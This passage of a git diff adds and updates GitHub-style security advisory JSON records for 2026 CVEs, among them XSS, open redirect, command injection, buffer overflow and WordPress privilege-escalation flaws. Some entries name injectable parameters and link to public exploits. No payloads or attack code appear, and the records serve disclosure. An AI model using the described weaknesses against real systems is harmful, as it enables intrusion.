Generation ('Cross-site Scripting') vulnerability in PenciDesign Soledad soledad allows DOM-Based XSS.This issue affects Soledad: from n/a through <= 8.7.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27069" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soledad/vulnerability/wordpress-soledad-theme-8-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json b/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json index 9b7cb193a2e8e..e34377f86fd72 100644 --- a/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json +++ b/advisories/unreviewed/2026/02/GHSA-p9g6-vwf9-qggv/GHSA-p9g6-vwf9-qggv.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json b/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json new file mode 100644 index 0000000000000..66b1deda3652e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc25-pwr8-gpp2", + "modified": "2026-02-22T00:31:01Z", + "published": "2026-02-22T00:31:01Z", + "aliases": [ + "CVE-2026-2889" + ], + "details": "A vulnerability was detected in CCExtractor up to 0.96.5. Affected is the function processmp4 in the library src/lib_ccx/mp4.c. Performing a manipulation results in use after free. The attack is only possible with local access. The exploit is now public and may be used. Upgrading to version 0.96.6 is able to address this issue. The patch is named fd7271bae238ccb3ae8a71304ea64f0886324925. You should upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2889" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/issues/2055" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/pull/2057" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/commit/fd7271bae238ccb3ae8a71304ea64f0886324925" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor" + }, + { + "type": "WEB", + "url": "https://github.com/CCExtractor/ccextractor/releases/tag/v0.96.6" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0123/blob/main/cc3/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347182" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347182" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755029" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T22:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json index 2d40cf4763f91..edb136c8f66c1 100644 --- a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json +++ b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pc38-57g8-39gg", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-69752" ], "details": "An issue in the \"My Details\" user profile functionality of Ideagen Q-Pulse 7.1.0.32 allows an authenticated user to view other users' profile information by modifying the objectKey HTTP parameter in the My Details page URL.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T16:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pc7g-8v63-q7v6/GHSA-pc7g-8v63-q7v6.json b/advisories/unreviewed/2026/02/GHSA-pc7g-8v63-q7v6/GHSA-pc7g-8v63-q7v6.json new file mode 100644 index 0000000000000..93141c2b0950f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc7g-8v63-q7v6/GHSA-pc7g-8v63-q7v6.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc7g-8v63-q7v6", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2709" + ], + "details": "A flaw has been found in busy up to 2.5.5. The affected element is an unknown function of the file source-code/busy-master/src/server/app.js of the component Callback Handler. Executing a manipulation of the argument state can lead to open redirect. It is possible to launch the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2709" + }, + { + "type": "WEB", + "url": "https://github.com/busyorg/busy/issues/2287" + }, + { + "type": "WEB", + "url": "https://github.com/busyorg/busy/issues/2287#issue-3905518966" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346661" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346661" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753299" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pcm2-gfvw-8jpr/GHSA-pcm2-gfvw-8jpr.json b/advisories/unreviewed/2026/02/GHSA-pcm2-gfvw-8jpr/GHSA-pcm2-gfvw-8jpr.json new file mode 100644 index 0000000000000..68a3d71f00fc4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pcm2-gfvw-8jpr/GHSA-pcm2-gfvw-8jpr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pcm2-gfvw-8jpr", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25399" + ], + "details": "IPFire 2.21 Core Update 127 contains multiple stored cross-site scripting vulnerabilities in the extrahd.cgi script that allow attackers to inject malicious scripts through the FS, PATH, and UUID parameters. Attackers can submit POST requests with script payloads in these parameters to execute arbitrary JavaScript in the context of authenticated administrator sessions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25399" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-stored-xss-via-extrahdcgi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pcxg-vcf2-rp56/GHSA-pcxg-vcf2-rp56.json b/advisories/unreviewed/2026/02/GHSA-pcxg-vcf2-rp56/GHSA-pcxg-vcf2-rp56.json new file mode 100644 index 0000000000000..52a6c8835ab02 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pcxg-vcf2-rp56/GHSA-pcxg-vcf2-rp56.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pcxg-vcf2-rp56", + "modified": "2026-02-19T21:30:47Z", + "published": "2026-02-19T21:30:47Z", + "aliases": [ + "CVE-2026-23621" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain an arbitrary directory existence enumeration vulnerability in the ListServer.IsPathExist() web method exposed at /MailEssentials/pages/MailSecurity/ListServer.aspx/IsPathExist. An authenticated user can supply an unrestricted filesystem path via the JSON key \\\"path\\\", which is URL-decoded and passed to Directory.Exists(), allowing the attacker to determine whether arbitrary directories exist on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23621" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-listserver-ispathexist-absolute-directory-traversal-to-file-enumeration" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T19:22:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pf2p-f275-6cmx/GHSA-pf2p-f275-6cmx.json b/advisories/unreviewed/2026/02/GHSA-pf2p-f275-6cmx/GHSA-pf2p-f275-6cmx.json new file mode 100644 index 0000000000000..b79f07ce911b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pf2p-f275-6cmx/GHSA-pf2p-f275-6cmx.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf2p-f275-6cmx", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2703" + ], + "details": "A weakness has been identified in xlnt-community xlnt up to 1.6.1. Impacted is the function xlnt::detail::decode_base64 of the file source/detail/cryptography/base64.cpp of the component Encrypted XLSX File Parser. Executing a manipulation can lead to off-by-one. The attack requires local access. The exploit has been made available to the public and could be used for attacks. This patch is called f2d7bf494e5c52706843cf7eb9892821bffb0734. Applying a patch is advised to resolve this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2703" + }, + { + "type": "WEB", + "url": "https://github.com/xlnt-community/xlnt/issues/137" + }, + { + "type": "WEB", + "url": "https://github.com/xlnt-community/xlnt/commit/f2d7bf494e5c52706843cf7eb9892821bffb0734" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0128/blob/main/xl1/repro" + }, + { + "type": "WEB", + "url": "https://github.com/xlnt-community/xlnt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346649" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346649" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754377" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json b/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json index 5a465c71afacc..f6009b759ac39 100644 --- a/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json +++ b/advisories/unreviewed/2026/02/GHSA-pf56-w9mv-33wc/GHSA-pf56-w9mv-33wc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pf56-w9mv-33wc", - "modified": "2026-02-10T06:30:38Z", + "modified": "2026-02-17T15:31:33Z", "published": "2026-02-10T06:30:38Z", "aliases": [ "CVE-2026-24319" @@ -30,6 +30,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-312", "CWE-316" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json new file mode 100644 index 0000000000000..7c8bdd909df0a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf6r-4hv7-pr4f", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67991" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Reflected XSS.This issue affects User Extra Fields: from n/a through <= 16.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67991" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-16-8-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json new file mode 100644 index 0000000000000..5eedab98e0b85 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfgm-6983-f589", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-70831" + ], + "details": "A Remote Code Execution (RCE) vulnerability was found in Smanga 3.2.7 in the /php/path/rescan.php interface. The application fails to properly sanitize user-supplied input in the mediaId parameter before using it in a system shell command. This allows an unauthenticated attacker to inject arbitrary operating system commands, leading to complete server compromise.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70831" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve/issues/5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pfx5-88f6-hhwx/GHSA-pfx5-88f6-hhwx.json b/advisories/unreviewed/2026/02/GHSA-pfx5-88f6-hhwx/GHSA-pfx5-88f6-hhwx.json new file mode 100644 index 0000000000000..1b19394ee1523 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pfx5-88f6-hhwx/GHSA-pfx5-88f6-hhwx.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfx5-88f6-hhwx", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-0912" + ], + "details": "The Toret Manager plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'trman_save_option' function and on the 'trman_save_option_items' in all versions up to, and including, 1.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0912" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/toret-manager/tags/1.2.7/admin/class-toret-manager-admin.php#L210" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/toret-manager/tags/1.2.7/admin/class-toret-manager-admin.php#L227" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4b2fc891-f3c6-4f4f-ad52-0a1a949eed25?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json b/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json new file mode 100644 index 0000000000000..ef2f9d32c8a66 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pg46-g938-p94j/GHSA-pg46-g938-p94j.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg46-g938-p94j", + "modified": "2026-02-21T18:31:16Z", + "published": "2026-02-21T18:31:16Z", + "aliases": [ + "CVE-2026-2876" + ], + "details": "A vulnerability was determined in Tenda A18 15.13.07.13. This affects the function parse_macfilter_rule of the file /goform/setBlackRule. This manipulation of the argument deviceList causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2876" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/38" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347114" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347114" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754675" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T18:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json new file mode 100644 index 0000000000000..adaea3dbdea83 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg4q-7rh5-52c9", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-27502" + ], + "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in log.php via the search query parameter. The application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing an unauthenticated remote attacker to inject and execute arbitrary JavaScript in a victim's browser if the victim visits a crafted URL. This can be used to steal session data, perform actions as the victim, or modify displayed content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27502" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/log.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-log-php-search-reflected-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json b/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json new file mode 100644 index 0000000000000..df52a38062973 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgcw-657p-x286", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-1344" + ], + "details": "Tanium addressed an insecure file permissions vulnerability in Enforce Recovery Key Portal.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1344" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pgfc-hgqj-gfc4/GHSA-pgfc-hgqj-gfc4.json b/advisories/unreviewed/2026/02/GHSA-pgfc-hgqj-gfc4/GHSA-pgfc-hgqj-gfc4.json new file mode 100644 index 0000000000000..c0811583a9ffc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pgfc-hgqj-gfc4/GHSA-pgfc-hgqj-gfc4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgfc-hgqj-gfc4", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25398" + ], + "details": "IPFire 2.21 Core Update 127 contains multiple cross-site scripting vulnerabilities in the ovpnmain.cgi script that allow attackers to inject malicious scripts through VPN configuration parameters. Attackers can submit POST requests with script payloads in parameters like VPN_IP, DMTU, ccdname, ccdsubnet, DOVPN_SUBNET, DHCP_DOMAIN, DHCP_DNS, DHCP_WINS, ROUTES_PUSH, FRAGMENT, KEEPALIVE_1, and KEEPALIVE_2 to execute arbitrary JavaScript in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25398" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-cross-site-scripting-via-ovpnma" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pgvj-v9hv-3j6x/GHSA-pgvj-v9hv-3j6x.json b/advisories/unreviewed/2026/02/GHSA-pgvj-v9hv-3j6x/GHSA-pgvj-v9hv-3j6x.json new file mode 100644 index 0000000000000..5405924cf00d6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pgvj-v9hv-3j6x/GHSA-pgvj-v9hv-3j6x.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgvj-v9hv-3j6x", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-15041" + ], + "details": "The BackWPup – WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the save_site_option() function in all versions up to, and including, 5.6.2. This makes it possible for authenticated attackers, with level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15041" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.1/src/Jobs/API/Rest.php?marks=88,337,788-812#L88" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3443073%40backwpup&new=3443073%40backwpup&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab8f440-2910-41a3-8bbc-afb4cafd33b5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + 